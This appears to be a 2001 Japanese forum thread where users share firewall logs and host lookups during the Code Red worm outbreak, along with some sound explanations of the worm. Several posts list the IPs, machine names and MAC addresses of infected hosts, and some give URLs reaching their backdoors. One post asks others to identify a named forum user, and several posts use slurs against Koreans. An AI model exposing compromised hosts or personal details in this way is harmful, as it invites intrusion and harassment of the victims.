NetBIOS: ｿﾃｻｩｹﾌ1ﾈ｣ j
MAC: 00011B22CF92
DNS: ｿﾃｻｩｹﾌ1ﾈ｣

>>241
　系統樹内部だともっとスゴイコトニなってる模様

IP: 61.180.64.170
Node: JJWB
Group: WORKGROUP
NetBIOS: IS~JJWB
MAC: 5254AB3837F3

IP: 61.207.157.223
Node: SASAKI
Group: DATE
MAC: 444553547777
DNS: p5223-ipad04maru.tokyo.ocn.ne.jp

IP: 61.207.110.121
DNS: p3121-ip02sapodoori.hokkaido.ocn.ne.jp

IP: 61.32.129.183
Node: ｿﾀｹﾌｶ
Group: DIOR.CO.KR
NetBIOS: IS~ｿﾀｹﾌｶ
MAC: 000021D060F1

IP: 211.39.189.110
Node: HAEDONG-WEBSERV
Group: SERVER
NetBIOS: IS~EDONG-WEBSERV
MAC: 00485480A3E0
DNS: HAEDONG-WEBSERV

IP: 211.48.107.135
Node: YAMA2002
Group: WORKGROUP
NetBIOS: IS~YAMA2002
MAC: 0050DA5D192F
DNS: YAMA2002

IP: 193.231.188.73
DNS: 193.231.188.73.catv.rdsor.ro

IP: 211.39.13.230
Node: SEOUL
Group: WORKGROUP
NetBIOS: IS~SEOUL
MAC: 000629B31877

IP: 211.114.48.243
Node: FILES
Group: ﾀ?ｻ?ｽﾇ
NetBIOS: IS~FILES
MAC: 00001CD4C83E
DNS: FILES

61.120.223.186
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.120.208.0-61.120.223.0
b. [ネットワーク名] ALPHA-NET
f. [組織名] アルファ株式会社
g. [Organization] ALPHA Co., Ltd.
m. [運用責任者] HW048JP
n. [技術連絡担当者] HW048JP
p. [ネームサーバ] ns.alpha-net.ne.jp
p. [ネームサーバ] ns2.alpha-net.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/01/19
[返却年月日]
[最終更新] 2001/01/19 15:42:12 (JST)
[email protected]

203.141.192.39
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.192.0
b. [ネットワーク名] SHIOJIRI
f. [組織名] 塩尻インターネット
g. [Organization] Shiojiri Internet
m. [運用責任者] MH425JP
n. [技術連絡担当者] JT002JP
p. [ネームサーバ] niagara.shiojiri.ne.jp
p. [ネームサーバ] ns-tk012.ocn.ad.jp
y. [通知アドレス]
[割当年月日] 1996/06/24
[返却年月日]
[最終更新] 1997/12/17 20:15:40 (JST)
[email protected]

211.13.215.80
211.13.215.81
メディアエクスチェンジ株式会社 (Media EXchange Inc.)
SUBA-200-C05 [サブアロケーション] 211.13.215.0
株式会社ナチュラルアイデンティティー (Natural Identity)
NA-IDENTITY [211.13.215.64 <-> 211.13.215.127] 211.13.215.64/26

210.136.106.17
株式会社ナチュラルアイデンティティー (Natural Identity)
NA-IDENTITY [210.136.106.0 <-> 210.136.106.63] 210.136.106.0/26
InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-124 [サブアロケーション] 210.136.106.0

61.113.31.226
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-T63 [サブアロケーション] 61.113.31.0
関西インターネット (KANSAI INTERNET)
KANSAIINTNET [61.113.31.224 <-> 61.113.31.239] 61.113.31.224/28

211.13.215.80
211.13.215.81
メディアエクスチェンジ株式会社 (Media EXchange Inc.)
SUBA-200-C05 [サブアロケーション] 211.13.215.0
株式会社ナチュラルアイデンティティー (Natural Identity)
NA-IDENTITY [211.13.215.64 <-> 211.13.215.127] 211.13.215.64/26

210.136.106.17
株式会社ナチュラルアイデンティティー (Natural Identity)
NA-IDENTITY [210.136.106.0 <-> 210.136.106.63] 210.136.106.0/26
InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-124 [サブアロケーション] 210.136.106.0

61.113.31.226
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-T63 [サブアロケーション] 61.113.31.0
関西インターネット (KANSAI INTERNET)
KANSAIINTNET [61.113.31.224 <-> 61.113.31.239] 61.113.31.224/28

210.147.254.138
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.147.0.0-210.147.255.0
b. [ネットワーク名] NEC-MESH
f. [組織名] C&Cインターネットサービスmesh
(日本電気株式会社)
g. [Organization] C&C Internet Service mesh
(NEC Corporation)
m. [運用責任者] TN265JP
n. [技術連絡担当者] NK032JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1997/02/26
[返却年月日]
[最終更新] 2001/06/21 16:29:30 (JST)
[email protected]

210.238.190.99
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-TKY [サブアロケーション] 210.238.190.0
株式会社ベストミックスコンサルタント (BestMix Consultant Corp.)
INFOSITE-NET [210.238.190.64 <-> 210.238.190.127] 210.238.190.64/26

61.120.16.34
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-TKY [サブアロケーション] 61.120.16.0
ディー・ディー・シーエレクトロニクス株式会社 (DDC Electronics K.K)
DDC-NET [61.120.16.32 <-> 61.120.16.39] 61.120.16.32/29

210.225.8.121
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-979 [サブアロケーション] 210.225.8.0
エムエムエス・インターネット・ (MMS Internet Communications (I)
MMSIC [210.225.8.112 <-> 210.225.8.127] 210.225.8.112/28

202.229.31.34
株式会社 エヌ・ティ・ティ エックス (NTT Xing)
GOO [202.229.31.0 <-> 202.229.31.63] 202.229.31.0/26
InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-153 [サブアロケーション] 202.229.31.0

210.239.47.246
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.239.46.0-210.239.47.0
b. [ネットワーク名] AT-LINKNET
f. [組織名] 株式会社リンク・コミュニカティブ・アドクリエイターズ
g. [Organization] Link, Incorporated
m. [運用責任者] GO004JP
n. [技術連絡担当者] YI1082JP
p. [ネームサーバ] databook.atworks.co.jp
p. [ネームサーバ] ns.idc.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1999/03/30
[返却年月日]
[最終更新] 1999/03/30 17:50:26 (JST)
[email protected]

211.9.40.230
ビットドライブ (bit-drive)
SUBA-330-100 [サブアロケーション] 211.9.40.0
プライムプロバイド株式会社 (Prime Provide)
PRIMENETWORK [211.9.40.224 <-> 211.9.40.255] 211.9.40.224/27

210.189.77.54
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.189.77.0
b. [ネットワーク名] AT-LINKNET
f. [組織名] 株式会社リンク・コミュニカティブ・アドクリエイターズ
g. [Organization] Link, Incorporated
m. [運用責任者] GO004JP
n. [技術連絡担当者] YI1082JP
p. [ネームサーバ] databook.atworks.co.jp
p. [ネームサーバ] ns.idc.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1999/11/12
[返却年月日]
[最終更新] 1999/11/12 17:15:22 (JST)
[email protected]

61.120.108.5
落合博幸 (Ochiai,Hiroyuki)
EASE-NET [61.120.108.0 <-> 61.120.108.7] 61.120.108.0/29
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-NGN [サブアロケーション] 61.120.108.0

しつこい。

200.68.59.240
krに対して中立だったがこれからは敵として扱う事にするよ

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.127.0.0-211.127.127.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [運用責任者] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns2.odn.ne.jp
p. [ネームサーバ] ns4.odn.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2000/08/15
[返却年月日]
[最終更新] 2001/01/04 10:32:24 (JST)
[email protected]

以下、Personal FireWallのログより…
（ちなみに、モデム接続。頻繁に切ってるけど。）

日付と時刻 処理 サービス ポート モード IP アドレス ホスト名
2001.8.5 10:23:17 PM 拒否 Web 共有 80 TCP 211.14.200.227 00227.lane.tokyo.eaccess.ne.jp
2001.8.5 9:59:23 PM 拒否 Web 共有 80 TCP 202.107.217.198 202.107.217.198
2001.8.4 11:41:04 PM 拒否 Web 共有 80 TCP 202.202.96.13 202.202.96.13
2001.8.4 11:43:42 PM 拒否 Web 共有 80 TCP 210.117.67.221 210.117.67.221
2001.8.5 7:41:43 AM 拒否 Web 共有 80 TCP 210.175.10.245 210.175.10.245
2001.8.5 9:45:05 PM 拒否 Web 共有 80 TCP 211.101.170.38 211.101.170.38
2001.8.5 9:53:32 PM 拒否 Web 共有 80 TCP 211.106.176.223 211.106.176.223
2001.8.4 11:04:46 PM 拒否 Web 共有 80 TCP 211.108.126.64 211.108.126.64
2001.8.5 11:31:19 PM 拒否 Web 共有 80 TCP 211.110.121.145 211.110.121.145
2001.8.5 11:41:42 PM 拒否 Web 共有 80 TCP 211.111.152.203 211.111.152.203
2001.8.5 10:08:20 PM 拒否 Web 共有 80 TCP 211.115.95.221 211.115.95.221
2001.8.5 9:54:09 PM 拒否 Web 共有 80 TCP 211.116.233.208 211.116.233.208
2001.8.5 9:57:59 PM 拒否 Web 共有 80 TCP 211.117.39.36 211.117.39.36
2001.8.5 9:43:52 PM 拒否 Web 共有 80 TCP 211.117.39.69 211.117.39.69
2001.8.5 10:45:15 PM 拒否 Web 共有 80 TCP 211.167.109.133 211.167.109.133
2001.8.6 7:50:09 AM 拒否 Web 共有 80 TCP 211.174.60.97 211.174.60.97
2001.8.5 9:57:58 PM 拒否 Web 共有 80 TCP 211.188.197.131 211.188.197.131
2001.8.5 9:46:41 PM 拒否 Web 共有 80 TCP 211.190.164.141 211.190.164.141
2001.8.5 10:21:41 PM 拒否 Web 共有 80 TCP 211.195.40.66 211.195.40.66
2001.8.5 9:34:13 PM 拒否 Web 共有 80 TCP 211.196.189.41 211.196.189.41
2001.8.4 11:11:38 PM 拒否 Web 共有 80 TCP 211.197.29.72 211.197.29.72
2001.8.5 10:44:32 PM 許可 Web 共有 80 TCP 211.199.225.73 211.199.225.73
2001.8.5 9:54:23 PM 拒否 Web 共有 80 TCP 211.127.132.19 d37f84-019.tiki.ne.jp
2001.8.5 10:46:22 PM 拒否 Web 共有 80 TCP 211.110.7.221 icache1.thrunet.com
2001.8.5 11:51:09 PM 拒否 Web 共有 80 TCP 211.127.116.30 n01cc-03p30.ppp.odn.ad.jp
2001.8.5 9:52:12 PM 拒否 Web 共有 80 TCP 211.49.3.91 s211-49-3-91.thrunet.ne.kr
2001.8.5 11:12:27 PM 拒否 Web 共有 80 TCP 211.74.22.196 swtp22-196.adsl.seed.net.tw

The firewall has blocked Internet access to your computer (HTTP)from
203.25.165.1 (TCP Port 33233) [TCP Flags: S].Time: 01/08/06 8:24:10
211.192.100.18 (TCP Port 3587) [TCP Flags: S].Time: 01/08/06 8:24:42
211.254.4.13 (TCP Port 4474) [TCP Flags: S].Time: 01/08/06 8:28:12
211.34.99.237 (TCP Port 1606) [TCP Flags: S].Time: 01/08/06 8:33:28
211.222.119.126(TCP Port 4218) [TCP Flags: S].Time: 01/08/06 8:35:14
211.123.146.187(TCP Port 2854) [TCP Flags: S].Time: 01/08/06 8:35:30
211.183.9.7 (TCP Port 3277) [TCP Flags: S].Time: 01/08/06 8:36:26
211.114.41.2 (TCP Port 3706) [TCP Flags: S].Time: 01/08/06 8:36:42
211.254.35.44 (TCP Port 2449) [TCP Flags: S].Time: 01/08/06 8:41:06
211.123.102.195(TCP Port 4410) [TCP Flags: S].Time: 01/08/06 8:47:02
211.51.27.210 (TCP Port 4793) [TCP Flags: S].Time: 01/08/06 8:50:50
211.123.52.114 (TCP Port 2429) [TCP Flags: S].Time: 01/08/06 8:51:36
211.123.52.114 (TCP Port 2429) [TCP Flags: S].Time: 01/08/06 8:51:36
211.78.161.223 (TCP Port 1776) [TCP Flags: S].Time: 01/08/06 9:02:26
211.20.31.130 (TCP Port 3600) [TCP Flags: S].Time: 01/08/06 9:02:40
211.196.74.69 (TCP Port 1730) [TCP Flags: S].Time: 01/08/06 9:06:24
211.229.64.75 (TCP Port 2928) [TCP Flags: S].Time: 01/08/06 9:06:44
211.180.94.75 (TCP Port 3048) [TCP Flags: S].Time: 01/08/06 9:10:30
211.170.106.103(TCP Port 4712) [TCP Flags: S].Time: 01/08/06 9:17:54
211.229.61.235 (TCP Port 1977) [TCP Flags: S].Time: 01/08/06 9:18:16
211.130.33.55 (TCP Port 1421) [TCP Flags: S].Time: 01/08/06 9:19:30
211.221.136.116(TCP Port 4126) [TCP Flags: S].Time: 01/08/06 9:21:56
211.168.27.32 (TCP Port 4183) [TCP Flags: S].Time: 01/08/06 9:24:46

hachioji22-156.ppp-1.dion.ne.jp
この人Redに感染しとるよ

krよ、なぜそんなにポート80につなげたいんだ？

165.76.123.181
165.76.87.36
165.76.17.85
165.76.93.246
165.132.117.82
165.141.120.42
165.76.45.46
165.76.116.203
165.76.229.119
165.76.44.243
165.132.247.200
165.76.172.120
165.76.19.44

さっきから165から来てるんだけどなんなの？

>>349
あなたのIPも165から始まってないか？

そうですけど、なんでわかるんですか？

>IPアドレスはランダムに選ばれるわけではなくて､
>感染者のIPの近くのIPを選ぶからじゃない？

と別スレで見かけたよ。
俺は今61から始まってるが、今のところ61から始まる所からしか来てないし。

感染者ってことは、なんかに感染してるんですか？

>>352
CodeRedの新種は、3/8の確立でClassB内、4/8の確立でClassA内、1/8の確立でランダム、
のIPアドレスをターゲットにするようだよ。
なのでご近所さんからのアタックが多いんだね。

完全にランダムに選ぶより、同じセグメント内のアドレスをターゲットにした方が、
network reachable な確立が高いわけで、そういった意味で新種は賢いやね。

確立→確率
逝ってきます・・・

通算でバ姦国からアタック数が２０００を越えました。
艦長、そろそろフェーザー砲を撃ってもイイですか？

ＦＷに無数に残ってるコードレッド関係のＩＰをたどり
ある中国系の企業の担当者と話をする事ができました。

丁寧に謝罪と御礼をされました。

受付嬢に事情を理解させるのが大変でしたが
（ふぁいーあーわーくですか？）
ネットワーク担当者に繋がったてからは話が早かったです。

コードレッド関係のＩＰってどうやって区別するの?

コードレッド関係のＩＰってどうやって区別するの?

一回のアタックに同じＩＰが３っずつ来るのを
コードレッド関係と決め付けています。
数日前からこのパターンが始まりました。

過去にこのパターンが無かったもので

p4128-ipad01hodogaya.kanagawa.ocn.ne.jp 61.207.90.128
p3194-ipad02osakakita.osaka.ocn.ne.jp 61.207.216.194
いいねぇ　夏厨

http://www.interlink.or.jp/notification/backno/2001/trb029.html

10.123.192.137 (TCP Port 3524) [TCP Flags: S].

61.251.177.102 (TCP Port 4738) [TCP Flags: S].

61.160.87.210 (TCP Port 3609) [TCP Flags: S]

61.18.32.68 (TCP Port 2766) [TCP Flags: S].

61.76.59.2 (TCP Port 3949) [TCP Flags: S].

61.182.22.246

61.219.160.140

61.219.160.140 (TCP Port 4358）

61.121.105.161 (TCP Port 2543

61.145.111.208 (TCP Port 1992

211.113.142.140 (TCP Port 4576

61.121.225.51 (TCP Port 4090

202.183.239.68 (TCP Port 1075) [TCP Flags: S].
202.110.184.196 (TCP Port 4361) [TCP Flags: S].
202.233.21.122 (TCP Port 4681) [TCP Flags: S].
202.152.22.68 (TCP Port 4451) [TCP Flags: S].
61.167.60.218 (TCP Port 4429) [TCP Flags: S].
202.155.65.149 (TCP Port 4958) [TCP Flags: S].
202.30.170.155 (TCP Port 3539) [TCP Flags: S].
202.102.180.161 (TCP Port 3493) [TCP Flags: S].
202.110.184.204 (TCP Port 4636) [TCP Flags: S].
202.181.223.100 (TCP Port 4242) [TCP Flags: S].
202.233.33.135 (TCP Port 1564) [TCP Flags: S].
202.60.129.242 (TCP Port 1546) [TCP Flags: S].

IP: 211.226.23.2
Node: ALASKA
Group: GUNDAM
NetBIOS: BURNJUNG 
MAC: 0050BF337C77
DNS: ALASKA

61.74.167.18 (TCP Port 1841)

今日でこのスレ１０００逝くに一票。

61.141.204.115 (TCP Port 4283) [TCP Flags: S]

61.219.214.94 (TCP Port 3346) [TCP Flags: S].

10回もしつこい
210.103.212.139

61.74.79.206
61.218.60.124
61.153.17.175
61.33.30.241
61.33.30.241
211.243.157.199
211.75.149.35
211.57.203.121

同じIPから６秒置きに３〜４回。しつこく接続先変えて来ているんですが
何とかならないでしょうか。
今は、61.120.41.140　からです。

ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.143.47.204,http

>>382
えへへ

61.121.122. 58 ppa5058.wbs.ne.jp

f. [組織名] Web静岡 (株式会社 富士通インフォソフトテクノロジ)

真性バカが多過ぎる

http://www.uramon.com/top.htm
ここの人達もしらべれますか？
特に○子とかいうＨＮの人。

東京めたりっくがしつこいよ〜
メール送ろかな。

罵倒馴れ合い板のＨＮ王子。

>>387
自分もメタリックじゃないの？
おれはかなり自分と同じISPの奴から来るよ・・

211.7.237.194
株式会社四国情報通信ネットワーク (Shikoku Information & Telecommunication Network)
SUBA-171-A27 [サブアロケーション] 211.7.237.0
株式会社高知県人材情報研究所 (Kochikenjinzaijyouhoukenkyuusyo)
KENJIN-NET [211.7.237.192 <-> 211.7.237.207] 211.7.237.192/28

初めが↑で８秒でIP変えての連続攻撃。

211.57.94.148 211.219.12.205 211.210.48.58 211.187.206.232
211.117.39.61 211.62.120.26 211.117.105.189 211.228.165.37
211.117.39.86 211.36.129.80

http://www.uramon.com/top.htm
の罵倒馴れ合いという板の王子という人。
助けて下さい。

あなたが検索されたアドレス［ 61.120.88.162 ］のJPNICからの応答は以下の通りです。
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-FUK [サブアロケーション] 61.120.88.0
株式会社南和 (Nanwa Corporation)
NANWA-NET [61.120.88.160 <-> 61.120.88.175] 61.120.88.160/28

あなたが検索されたアドレス［ 61.120.41.140 ］のJPNICからの応答は以下の通りです。
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-TKY [サブアロケーション] 61.120.41.0
株式会社エスピーライダーズ (SP-RIDERS CO LTD)
SP-RIDERSNET [61.120.41.136 <-> 61.120.41.143] 61.120.41.136/29

あなたが検索されたアドレス［ 61.120.83.45 ］のJPNICからの応答は以下の通りです。
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-NGY [サブアロケーション] 61.120.83.0
株式会社アドコウ (ADKOU, CORPORATION)
ADOKOU [61.120.83.40 <-> 61.120.83.47] 61.120.83.40/29

あなたが検索されたアドレス［ 61.120.105.50 ］のJPNICからの応答は以下の通りです。
DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-HIR [サブアロケーション] 61.120.105.0
松藤 信行 (Matsufuji Nobuyuki)
SABA-NET [61.120.105.48 <-> 61.120.105.55] 61.120.105.48/29

61. 18. 32. 68 cm61-18-32-68.hkcable.com.hk
香港、台湾、カンコック・・インドネシアからも来てちょっと嬉しかった(藁

イタ電と間違い電話は違うよ

IP: 211.192.120.226
Node: SARIN
NetBIOS: IS~SARIN
Group: WORKGROUP
MAC: 00E0EE000733
DNS: SARIN

IP: 211.38.161.72
DNS: ﾀﾌﾀﾏｼ・
Node: ﾀﾌﾀﾏｼ・
NetBIOS: IS~ﾀﾌﾀﾏｼ・
Group: ｽﾂﾀﾏ
MAC: 444553547777

あの初心者なんですが教えてください。
ファイアーウォールソフトの体験版を入れてわかったのですが、
なんだかいろんな所からアクセスされてます。
ログは
08/06/01 20:15:47 OK 61.141.13.101 80 TCP
08/06/01 20:15:48 OK 61.141.13.101 80 TCP
08/06/01 20:15:53 OK 61.124.56.46 80 TCP
08/06/01 20:15:54 OK 61.124.56.46 80 TCP
08/06/01 20:15:55 OK 61.124.56.46 80 TCP
08/06/01 20:17:31 OK 61.32.249.42 80 TCP
08/06/01 20:17:32 OK 61.32.249.42 80 TCP
08/06/01 20:18:09 OK 61.43.133.148 80 TCP
08/06/01 20:18:10 OK 61.43.133.148 80 TCP
08/06/01 20:19:28 OK 61.218.50.235 80 TCP
08/06/01 20:21:07 OK 61.124.56.46 80 TCP
08/06/01 20:21:08 OK 61.124.56.46 80 TCP
08/06/01 20:21:09 OK 61.124.56.46 80 TCP
08/06/01 20:31:18 ERR! 61.180.240.155 80 TCP
08/06/01 20:31:19 ERR! 61.180.240.155 80 TCP
08/06/01 20:31:20 ERR! 61.180.240.155 80 TCP
08/06/01 20:31:36 ERR! 61.11.12.20 80 TCP
08/06/01 20:31:44 ERR! 61.11.12.20 80 TCP
08/06/01 20:32:18 ERR! 61.133.2.133 80 TCP
08/06/01 20:32:19 ERR! 61.133.2.133 80 TCP
08/06/01 20:37:54 ERR! 61.183.34.68 80 TCP
08/06/01 20:37:55 ERR! 61.183.34.68 80 TCP
08/06/01 20:37:55 ERR! 61.183.34.68 80 TCP
08/06/01 20:44:02 ERR! 61.170.140.146 80 TCP
08/06/01 20:44:03 ERR! 61.170.140.146 80 TCP
こんな感じです。
香港とか韓国とか、はてはinfowebなんてのもあります。
狙われてるんでしょうか？？
プロバイダーはニフティーなんですが向こうが無差別にスキャンしているだけでしょうか？？

氏んでくれ

>>397
たいへんだ！まだ、対策をこうじていない人がいたんだ！
それはCodeRedっていうウィルスに感染しているんですよ。
このウィルスは凶悪なので、すぐにOSの再インストールし、
以後はNetに繋がないことをおすすめします。
早くしないと、大変なことになっちゃうYO！

ttp://61.220.18.253/
ttp://61.180.207.82/
ttp://61.218.120.98/
ttp://www.daum.net/
ttp://61.117.112.17/

>>397
お願いですから初心者版に逝ってください

バカばかりだな

ここに来るなボケ

>>397
ちょーどワームが大流行中で日本国中攻撃されてるんで、
びびらんでよい。
CodeRed をキーワードに検索でもかけて自分でしらべてちょ。
Win2000でOS付属のWebサーバ動作させてたらピンチです。
いじょ。

どうもご迷惑をおかけしました。

ずーっとずーっとずーっとずーっとWeb共有。
コレなんか同じ東めたユーザーからだし。。。やめてよ。。。

日付と時刻: 01.8.6 11:14:13 PM
処理: アクセス試行を拒否しました
サービス: Web 共有
ポート: 80
モード: TCP
IP アドレス: 61.200.21.118
ホスト名: xdsl021118.061200.metallic.ne.jp

なんだCodeRedのせいなの？
どうも御迷惑をおかけしました！

もう昔のことなのでどうでもいいが
今年の7月19日午前1時近くに94回アタックしてきた
この人
IP: 211.15.205.250
Node: U9X6A7
DNS: fl-hyg01-p250.alpha-net.ne.jp
Group: WORKGROUP
MAC: 444553547777
は何がしたかったんだろう。

IP: 61.125.84.216
Node: KUROKI
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0090CCA45D50
DNS: zaq3d7d54d8.zaq.ne.jp

IP: 61.125.95.250
Node: KAI
Group: WORKGROUP
NetBIOS: IS~KAI
MAC: 0090FE5301D4
DNS: zaq3d7d5ffa.zaq.ne.jp

IP: 61.37.101.21
Node: ﾈ<AB>ﾁﾘｸ
Group: ﾀ?ｻ?ｽﾇ
NetBIOS: ADMINISTRATOR
MAC: 00E07DA4204C
DNS: ﾈｫﾁﾘｸ

ﾀ?ｻ?ｽﾇﾀﾝ

IP: 61.118.58.223
DNS: p0223-ipad01aobadori.miyagi.ocn.ne.jp
ん？

IP: 211.119.242.64
Node: BUSINESS
Group: MANAGEMENT
NetBIOS: IS~BUSINESS
MAC: 0004AC258237
DNS: BUSINESS

Aug 7 07:02:54 TCP: port scan detected [port 443] from ***.***.**(*.*.*.*) [ports 50859,50860,50861,50862,50864,...]
Aug 7 07:10:57 TCP: port scan mode expired for ***.***.**(*.*.*.*) - received a total of 85 packets (2380 bytes).
これはport scan ですか？
見てたりして（汗

IP: 202.223.125.188
DNS: pdf7dbc.kngwnt01.ap.so-net.ne.jp
Node: 初号機
Group: NIKKEN2
NetBIOS: NIKKEN2
MAC: 444553547777

最近繋げるたびにＵＳＡからポートスキャンされる（鬱
61.74.202.143
61.220.179.178
61.36.83.46
とか。８月に入ってとくに酷い。実害は無いとは思うが…

１日で60件ばかしアタックされてるんですけど・・・
これってどうなんですか？
CodeRedとか言うやつのせいなのでしょうか？

ちなみに、BlackICEを使ってます。

>>416
そ。ICE動かしときゃ大丈夫です。おしまい。

消防でもアクセス可能なBackdoorできててマズすぎるので、
晒すのはよそうNE!! (て、このスレでは無理か)

>>417
BlackICEは大丈夫なんですか？
BlackICEのサイトでチェックすると、↓が出てくるんですけど・・・

概要
何者かかが、このシステムで HTTP サーバが起動していると想定し、
このサーバにアクセスしようとしています。

で、今、侵入者（？）の数を数えたら66件も有りました。＜１日で
流石にうざいんですけど・・・・

>>418
黄色の警告は、防御に成功した証です。黄色は無視しとき。
Code Redを防御してるのではなくて、ポート80(自分のマシンのHTTPサーバ)を
外からアクセス禁止してるだけです。
うざいけどそのままにしとき。ここんとこCodeRedがはやってるから。
あるいは、「設定変臭」−「ユーザ設定」−「アタック通知」で、表示や音をオレンジ以上だけにしとく。
ルータ使ってるなら、ルータで外から自分ちの80番ポートにくるやつはじけばいいよ。
このスレでは消防の称号をもらいそうだから去レ。(漏れも猿）。

>>419
サーバ用で80公開の場合でも、ちゃんと検知するみたいね。
http://www.toyo.co.jp/security/news/ids0108062.html
＃いっとくが、回しモンではない (藁

>>419
忠告どうもです。今、↓読んできました。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=992171869&ls=50

要するに無視しとけば良いんですね？
でも、２０日までこんな感じでやらなくちゃいけないん？？

203.237.122.141
CodeREDきました
http://203.237.122.141/hdd/慎鉢/
に映画がたくさんあります。
ただし中国語と思われ（藁

port2409,49320を突いてきたので何だと思ったら何コイツ？
ftp://206.152.3.9/

>>423
踏み台？

port2409,49320はなにがあるんですか？

210.243.209.209

>>425
バックドアでしょ。
送り込んだ奴が好き勝手に設定するから、何かはわからんて。

80叩き、もうウンザリ
今日だけで軽く３０人以上に叩かれまくり…
210.109.54.19 ←80叩きの一人

IP: 211.218.251.204
Node: PANGPANG
Group: TERAPARK
NetBIOS: IS~PANGPANG
MAC: 0050BF08F2BA
DNS: PANGPANG

http://x01-040.kobe.highway.ne.jp/////////"d:\"

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.143.32.0-210.143.35.0
b. [ネットワーク名] TTCN
f. [組織名] 東京通信ネットワーク株式会社
g. [Organization] TOKYO TELECOMMUNICATION NETWORK CO.,INC.
m. [運用責任者] AW174JP
n. [技術連絡担当者] KN5263JP
p. [ネームサーバ] ns1.ttcn.ne.jp
p. [ネームサーバ] ns2.ttcn.ne.jp
p. [ネームサーバ] ns2.ttnet.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1999/02/10
[返却年月日]
[最終更新] 2001/07/04 13:16:48 (JST)
[email protected]

IP: 211.177.198.196
Node: WHITEMUSE
Group: WORKGROUP
NetBIOS: IS~WHITEMUSE
MAC: 0050BF08FF67

The firewall has blocked Internet access to your computer (HTTP) from 61.159.233.198 (TCP Port 2676).
１日１００回　以上　アクセスしてくるんです
誰かお願いです　なんなんでしょうか？

これはバカの分布図・・・
http://www.security.nl/misc/codered-stats/geodist.gif

あの国にバカが多過ぎてニポンが見えない

変？

ウイルス

アドレス[email protected]
　IP　　p6010-ip01hodogaya.kanagawa.ocn.ne.jp

アドレス　[email protected]
　IP　　p6010-ip01hodogaya.kanagawa.ocn.ne.jp

IP: 211.111.168.44
Node: ｼﾛﾀｺｰ・
Group: WORKGROUP
NetBIOS: IS~ｼﾛﾀｺｰ・
MAC: 0050BF189A4C

IP先がハングルなので、韓国だと思う。
文字化けだと思うけど「ｼﾛﾀｺｰ」はうけた。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.117.53.0
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [運用責任者] KT6191JP
n. [技術連絡担当者] KW062JP
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/02/07
[返却年月日]
[最終更新] 2001/07/30 10:49:51 (JST)
[email protected]

211.130.13.250
メール出したけどムシ（つーか空メール返してその後着信拒否ｺﾞﾙｧ）アタックはあいかわらず。
CordRedIIに感染してまっす。
上級プロパに連絡したけどOCNだからなあー。

203.253.18.209
203.94.159.232
203.197.87.71
61.80.76.244
203.229.177.1
203.236.168.209
203.182.194.243
203.253.205.139
203.147.173.172
203.253.43.108
211.248.167.188
203.234.163.248
203.247.196.17
203.236.221.174
203.149.129.35
203.241.120.235
203.182.229.223
203.239.61.242
212.199.115.188
203.144.224.242
203.161.238.154
203.165.154.177
203.107.6.27
203.236.238.141
203.228.190.58
203.45.187.60
203.252.157.92
203.182.128.227
203.237.229.195

約一時間で87回　助けてください

>>443
氏んで下さい。

意味が判らなくて怖いんだもん

>>443,445
うちは、１時間で200回くらい。
家でたとえると、玄関のドアを開くかどうかガチャガチャさせて、鍵がかかってい
れば、諦めて立ち去っているようなものかな。
NT系でIIS入れていてパッチを当ててない人が鍵が壊れている状態かな。
FW入れていれば、まず大丈夫だと思う。

IP: 211.190.132.71
Node: 501-25
Group: 501
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0004766E320E
DNS: 501-25

>>446
答えてくれてありがとう。
あんまり心配しなくてもいいんでしょうか？
ここ一週間で回数が急激に増えたから心配になっちゃったの

IP 210.104.117.4

IP Address : 210.104.117.0-210.104.117.255
Network Name : CHUNUN
Connect ISP Name : PUBNET
Connect Date :
Registration Date : 19971113

[ Organization Information ]
Orgnization ID : ORG23728
Org Name : Chununjin Business High School

なんだ、人ん家の PORT 80 に探り入れる授業でもやってんのか？

IP: 211.240.44.98
DNS: KOREACAR02
NetBIOS: IS~KOREACAR02
Node: KOREACAR02
Group: WORKGROUP
